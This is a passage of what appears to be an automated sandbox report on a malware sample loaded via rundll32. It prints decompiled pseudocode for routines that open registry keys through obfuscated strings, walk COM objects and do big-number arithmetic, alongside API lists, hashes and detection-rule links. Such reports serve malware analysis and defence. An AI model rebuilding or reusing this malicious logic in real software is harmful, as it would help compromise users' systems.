				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0x52dd33c);
					_t97 = 0x80000002;
					L6:
					_t60 = E052D809F(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E052D88B7(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E052D9039(_a8);
						goto L29;
					}
					_t65 =  *0x52dd27c; // 0x202a5a8
					_t16 = _t65 + 0x52de8fe; // 0x65696c43
					_t68 = E052D809F(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d052dc0
						if(E052DA635(_t103,  *_t33, _t97, _a8,  *0x52dd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x52dd27c; // 0x202a5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0x52dea5f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x52de89f; // 0x55434b48
								_t73 = _t34;
							}
							if(E052D816C(_t73,  *0x52dd334,  *0x52dd338,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0x52dd27c; // 0x202a5a8
									_t44 = _t75 + 0x52de871; // 0x74666f53
									_t78 = E052D809F(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d052dc0
										E052D2659( *_t47, _t97, _a8,  *0x52dd338, _a24);
										_t49 = _t107 + 0x10; // 0x3d052dc0
										E052D2659( *_t49, _t97, _t105,  *0x52dd330, _a16);
										E052D9039(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d052dc0
									E052D2659( *_t40, _t97, _a8,  *0x52dd338, _a24);
									_t43 = _t107 + 0x10; // 0x3d052dc0
									E052D2659( *_t43, _t97, _a8,  *0x52dd330, _a16);
								}
								if( *_t107 != 0) {
									E052D9039(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d052dc0
					if(E052D6BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d052dc0
							E052DA635(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E052D9039(_t106);
						_t104 = _a16;
					}
					E052D9039(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E052DA8D8(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0x52dd33c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}























                                                  0x052d17d5
                                                  0x052d17de
                                                  0x052d17e5
                                                  0x052d17ea
                                                  0x052d1857
                                                  0x052d185d
                                                  0x052d1862
                                                  0x052d186b
                                                  0x052d1872
                                                  0x052d1875
                                                  0x052d19e9
                                                  0x052d19f0
                                                  0x052d19f0
                                                  0x052d19f5
                                                  0x052d19f7
                                                  0x052d19f7
                                                  0x052d1a00
                                                  0x052d1a00
                                                  0x052d187b
                                                  0x052d1887
                                                  0x052d19df
                                                  0x052d19e2
                                                  0x00000000
                                                  0x052d19e2
                                                  0x052d188d
                                                  0x052d1892
                                                  0x052d189b
                                                  0x052d18a2
                                                  0x052d18a5
                                                  0x052d18ef
                                                  0x052d18ef
                                                  0x052d1902
                                                  0x052d190c
                                                  0x052d1914
                                                  0x052d1919
                                                  0x052d1923
                                                  0x052d1923
                                                  0x052d191b
                                                  0x052d191b
                                                  0x052d191b
                                                  0x052d191b
                                                  0x052d1945
                                                  0x052d194d
                                                  0x052d197b
                                                  0x052d1980
                                                  0x052d1989
                                                  0x052d198e
                                                  0x052d1992
                                                  0x052d19c4
                                                  0x052d1994
                                                  0x052d19a1
                                                  0x052d19a4
                                                  0x052d19b4
                                                  0x052d19b7
                                                  0x052d19bd
                                                  0x052d19bd
                                                  0x052d194f
                                                  0x052d195c
                                                  0x052d195f
                                                  0x052d1971
                                                  0x052d1974
                                                  0x052d1974
                                                  0x052d19ce
                                                  0x052d19da
                                                  0x052d19d0
                                                  0x052d19d3
                                                  0x052d19d3
                                                  0x052d19ce
                                                  0x052d1945
                                                  0x00000000
                                                  0x052d190c
                                                  0x052d18b4
                                                  0x052d18be
                                                  0x052d18c0
                                                  0x052d18c5
                                                  0x052d18c9
                                                  0x052d18cb
                                                  0x052d18d6
                                                  0x052d18d9
                                                  0x052d18d9
                                                  0x052d18df
                                                  0x052d18e4
                                                  0x052d18e4
                                                  0x052d18ea
                                                  0x00000000
                                                  0x052d18ea
                                                  0x052d17ef
                                                  0x00000000
                                                  0x052d1816
                                                  0x052d1816
                                                  0x052d1822
                                                  0x052d1835
                                                  0x052d183b
                                                  0x052d1843
                                                  0x00000000
                                                  0x052d1843

                                                  APIs
                                                  • StrChrA.SHLWAPI(052D3C81,0000005F,00000000,00000000,00000104), ref: 052D1808
                                                  • lstrcpy.KERNEL32(?,?), ref: 052D1835
                                                    • Part of subcall function 052D809F: lstrlen.KERNEL32(?,00000000,052DD330,00000001,052D2200,052DD00C,052DD00C,00000000,00000005,00000000,00000000,?,?,?,052D96C1,052D23E9), ref: 052D80A8
                                                    • Part of subcall function 052D809F: mbstowcs.NTDLL ref: 052D80CF
                                                    • Part of subcall function 052D809F: memset.NTDLL ref: 052D80E1
                                                    • Part of subcall function 052D2659: lstrlenW.KERNEL32(052D3C81,?,?,052D19A9,3D052DC0,80000002,052D3C81,052D8B1E,74666F53,4D4C4B48,052D8B1E,?,3D052DC0,80000002,052D3C81,?), ref: 052D2679
                                                    • Part of subcall function 052D9039: HeapFree.KERNEL32(00000000,00000000,052D7F18,00000000,?,?,00000000), ref: 052D9045
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 052D1857
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                  • String ID: \
                                                  • API String ID: 3924217599-2967466578
                                                  • Opcode ID: cc3c1d34c609a1164d52da2c5ce285a882b3410854d61373ca6ef780663fab5f
                                                  • Instruction ID: 2cd82e6a80de5b4dfb6f2f596eb688809ae1b1afa511db174c45edf5f9475d17
                                                  • Opcode Fuzzy Hash: cc3c1d34c609a1164d52da2c5ce285a882b3410854d61373ca6ef780663fab5f
                                                  • Instruction Fuzzy Hash: BA517C7262020AFFDF11EFA0DC89EAABBBAFF48210F008415FA5596590D731D925DB70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D163F, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(?), ref: 052D1680
                                                  • SysFreeString.OLEAUT32(?), ref: 052D1763
                                                    • Part of subcall function 052D52F9: SysAllocString.OLEAUT32(052DC2B0), ref: 052D5349
                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 052D17B7
                                                  • SysFreeString.OLEAUT32(?), ref: 052D17C5
                                                    • Part of subcall function 052D2436: Sleep.KERNEL32(000001F4), ref: 052D247E
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                  • String ID:
                                                  • API String ID: 3193056040-0
                                                  • Opcode ID: 9e6f8729cdd22ddf4a5261ce0a512151720f1193eb168adbfa86714056723d22
                                                  • Instruction ID: 545cc5144e32761cc9a31c87c979fd7e6b0034af6573b20f509ee39537b0c06f
                                                  • Opcode Fuzzy Hash: 9e6f8729cdd22ddf4a5261ce0a512151720f1193eb168adbfa86714056723d22
                                                  • Instruction Fuzzy Hash: 52517676A1420AEFDB40DFE4D8888AEF7B6FF88350B148828E505EB260D7319D55CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D52F9, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 46%
                                                  			E052D52F9(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x52dd27c; // 0x202a5a8
					_t5 = _t102 + 0x52de038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x52dc2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x52dd27c; // 0x202a5a8
												_t28 = _t108 + 0x52de0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x52dd27c; // 0x202a5a8
														_t33 = _t78 + 0x52de078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                                  0x052d52fe
                                                  0x052d5307
                                                  0x052d5308
                                                  0x052d530c
                                                  0x052d5312
                                                  0x052d5318
                                                  0x052d5321
                                                  0x052d5327
                                                  0x052d5331
                                                  0x052d5333
                                                  0x052d5339
                                                  0x052d533e
                                                  0x052d5349
                                                  0x052d5351
                                                  0x052d5354
                                                  0x052d5477
                                                  0x052d535a
                                                  0x052d535a
                                                  0x052d5367
                                                  0x052d536d
                                                  0x052d5373
                                                  0x052d5377
                                                  0x052d537d
                                                  0x052d538a
                                                  0x052d538e
                                                  0x052d5394
                                                  0x052d5397
                                                  0x052d539d
                                                  0x052d53a3
                                                  0x052d53a9
                                                  0x052d53ac
                                                  0x052d53af
                                                  0x052d53b5
                                                  0x052d53be
                                                  0x052d53c4
                                                  0x052d53c5
                                                  0x052d53c8
                                                  0x052d53c9
                                                  0x052d53ca
                                                  0x052d53d2
                                                  0x052d53d3
                                                  0x052d53d4
                                                  0x052d53d6
                                                  0x052d53da
                                                  0x052d53de
                                                  0x00000000
                                                  0x00000000
                                                  0x052d53e4
                                                  0x052d53ed
                                                  0x052d53f3
                                                  0x052d53fd
                                                  0x052d5401
                                                  0x052d5403
                                                  0x052d5410
                                                  0x052d5414
                                                  0x052d541c
                                                  0x052d5421
                                                  0x052d5433
                                                  0x052d5435
                                                  0x052d543b
                                                  0x052d543b
                                                  0x052d5444
                                                  0x052d5444
                                                  0x052d5446
                                                  0x052d544c
                                                  0x052d544c
                                                  0x052d544f
                                                  0x052d5455
                                                  0x052d5458
                                                  0x052d5461
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x052d5461
                                                  0x052d53b5
                                                  0x052d53af
                                                  0x052d5397
                                                  0x052d5467
                                                  0x052d5467
                                                  0x052d546d
                                                  0x052d546d
                                                  0x052d5473
                                                  0x052d5473
                                                  0x052d547c
                                                  0x052d5482
                                                  0x052d5482
                                                  0x052d533e
                                                  0x052d548b

                                                  APIs
                                                  • SysAllocString.OLEAUT32(052DC2B0), ref: 052D5349
                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 052D542B
                                                  • SysFreeString.OLEAUT32(00000000), ref: 052D5444
                                                  • SysFreeString.OLEAUT32(?), ref: 052D5473
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloclstrcmp
                                                  • String ID:
                                                  • API String ID: 1885612795-0
                                                  • Opcode ID: 96b93a426e2536a3a7e9059e9294133f677d584662a59e541c44674cd511e070
                                                  • Instruction ID: 093565423777821af6d4bd0e05d3cfb837f2b9ad4ba604e5aa52cc2e21b069f6
                                                  • Opcode Fuzzy Hash: 96b93a426e2536a3a7e9059e9294133f677d584662a59e541c44674cd511e070
                                                  • Instruction Fuzzy Hash: A8512D75E00519EFCB00DFA8C8889AEF7BAFF88705B148594E915EB250DB719D01CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D1017, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E052D1017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E052DA7AA(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E052D968F(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E052D8967(_t101,  &_v236, _a8, _t96 - _t81);
					E052D8967(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E052D968F(_t101, 0x52dd1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E052D968F(_a16, _a4);
						E052D1D6C(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L052DB0C8();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L052DB0C2();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E052D1FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E052D8B62(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E052D9100(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x52dd1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                  0x052d101a
                                                  0x052d1026
                                                  0x052d102c
                                                  0x052d1031
                                                  0x052d1035
                                                  0x052d1192
                                                  0x052d1196
                                                  0x052d1196
                                                  0x052d103b
                                                  0x052d103f
                                                  0x052d1045
                                                  0x052d1046
                                                  0x052d1051
                                                  0x052d1057
                                                  0x052d105c
                                                  0x052d105f
                                                  0x052d1079
                                                  0x052d1085
                                                  0x052d108e
                                                  0x052d1098
                                                  0x052d109d
                                                  0x052d109f
                                                  0x052d10a2
                                                  0x052d1150
                                                  0x052d1156
                                                  0x052d1167
                                                  0x052d117a
                                                  0x052d118a
                                                  0x00000000
                                                  0x052d118f
                                                  0x052d10ab
                                                  0x052d10b2
                                                  0x052d10b6
                                                  0x052d10bc
                                                  0x052d10be
                                                  0x052d10c0
                                                  0x052d10c2
                                                  0x052d10c4
                                                  0x052d10ce
                                                  0x052d10d3
                                                  0x052d10d5
                                                  0x052d10d7
                                                  0x052d10d8
                                                  0x052d10d9
                                                  0x052d10da
                                                  0x052d10e1
                                                  0x052d10e8
                                                  0x052d10eb
                                                  0x052d10eb
                                                  0x052d10b8
                                                  0x052d10b8
                                                  0x052d10b8
                                                  0x052d10f3
                                                  0x052d10fb
                                                  0x052d1104
                                                  0x052d1109
                                                  0x052d1109
                                                  0x052d110e
                                                  0x00000000
                                                  0x00000000
                                                  0x052d1110
                                                  0x052d1113
                                                  0x052d111d
                                                  0x00000000
                                                  0x00000000
                                                  0x052d111f
                                                  0x052d111f
                                                  0x052d1129
                                                  0x052d1109
                                                  0x052d110e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x052d110e
                                                  0x052d1133
                                                  0x052d1136
                                                  0x052d1139
                                                  0x052d1140
                                                  0x052d1140
                                                  0x052d114d
                                                  0x00000000
                                                  0x052d114d
                                                  0x052d1048
                                                  0x052d104c
                                                  0x052d104d
                                                  0x052d104f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x052d104f
                                                  0x00000000

                                                  APIs
                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 052D10C4
                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 052D10DA
                                                  • memset.NTDLL ref: 052D117A
                                                  • memset.NTDLL ref: 052D118A
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memset$_allmul_aulldiv
                                                  • String ID:
                                                  • API String ID: 3041852380-0
                                                  • Opcode ID: ba0d754adc1d9d27e75fa1ca3951f9e601af30203b5b5b1ca7ef36e49dc1570c
                                                  • Instruction ID: fc0d6e2d9ccb7160450737a2f632a5b8d6ce00ab1abacc770acc1238bccb6c7e
                                                  • Opcode Fuzzy Hash: ba0d754adc1d9d27e75fa1ca3951f9e601af30203b5b5b1ca7ef36e49dc1570c
                                                  • Instruction Fuzzy Hash: BF419571B20249ABDB10EFA8DC44FEEB775EF44310F108529F91AA7180D7719D54CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052DA9AB, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlen.KERNEL32(?,00000008,75144D40), ref: 052DA9BD
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • ResetEvent.KERNEL32(?), ref: 052DAA31
                                                  • GetLastError.KERNEL32 ref: 052DAA54
                                                  • GetLastError.KERNEL32 ref: 052DAAFF
                                                    • Part of subcall function 052D9039: HeapFree.KERNEL32(00000000,00000000,052D7F18,00000000,?,?,00000000), ref: 052D9045
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                  • String ID:
                                                  • API String ID: 943265810-0
                                                  • Opcode ID: 680b1900675e3f36c2a08e846b5159b4a42ef91637b59e94c54b50d95de965c1
                                                  • Instruction ID: eaeb38c7da3f1b77ba10282bf1b79bdf5e8105fdcc94dd1413d7a3d997e0f867
                                                  • Opcode Fuzzy Hash: 680b1900675e3f36c2a08e846b5159b4a42ef91637b59e94c54b50d95de965c1
                                                  • Instruction Fuzzy Hash: 55415C72921605BBDB219FA5DC8DEABBFBDEF45710B104A19F146E10D0EB71E944CA30
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D39BF, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E052D39BF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x52dd134() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x52dd168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E052D2049(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x52dd134() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E052D9039(_v16);
							if(_t58 == 0) {
								_t58 = E052D7A07(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E052D1C47( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E052D1C47( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                                  0x052d39bf
                                                  0x052d39ce
                                                  0x052d39d3
                                                  0x052d39d5
                                                  0x052d39da
                                                  0x052d39db
                                                  0x052d39e0
                                                  0x052d39e1
                                                  0x052d39ec
                                                  0x052d3a1d
                                                  0x052d3a22
                                                  0x052d3ae5
                                                  0x052d3ae8
                                                  0x052d3aee
                                                  0x052d3aee
                                                  0x052d3a2f
                                                  0x052d3a37
                                                  0x052d3ae2
                                                  0x00000000
                                                  0x052d3ae2
                                                  0x052d3a42
                                                  0x052d3a49
                                                  0x052d3a4c
                                                  0x052d3ad4
                                                  0x052d3ad5
                                                  0x052d3ad5
                                                  0x052d3adb
                                                  0x00000000
                                                  0x052d3adb
                                                  0x052d3a52
                                                  0x052d3a54
                                                  0x052d3a5a
                                                  0x052d3a5b
                                                  0x052d3a5b
                                                  0x052d3a5e
                                                  0x052d3a61
                                                  0x052d3a67
                                                  0x052d3a6c
                                                  0x052d3a6d
                                                  0x052d3a72
                                                  0x052d3a75
                                                  0x052d3a80
                                                  0x00000000
                                                  0x00000000
                                                  0x052d3a88
                                                  0x052d3a90
                                                  0x052d3ab9
                                                  0x052d3abc
                                                  0x052d3ac3
                                                  0x052d3ace
                                                  0x052d3ace
                                                  0x00000000
                                                  0x052d3ac3
                                                  0x052d3a9c
                                                  0x052d3aa0
                                                  0x00000000
                                                  0x00000000
                                                  0x052d3aa2
                                                  0x052d3aa7
                                                  0x00000000
                                                  0x00000000
                                                  0x052d3aa9
                                                  0x052d3aa9
                                                  0x052d3aae
                                                  0x00000000
                                                  0x00000000
                                                  0x052d3ab0
                                                  0x052d3ab1
                                                  0x052d3ab4
                                                  0x052d3ab4
                                                  0x052d3a5b
                                                  0x052d39f4
                                                  0x052d39fc
                                                  0x052d3a15
                                                  0x052d3a17
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x052d3a17
                                                  0x052d3a08
                                                  0x052d3a0c
                                                  0x00000000
                                                  0x00000000
                                                  0x052d3a12
                                                  0x00000000

                                                  APIs
                                                  • ResetEvent.KERNEL32(?), ref: 052D39D5
                                                  • GetLastError.KERNEL32 ref: 052D39EE
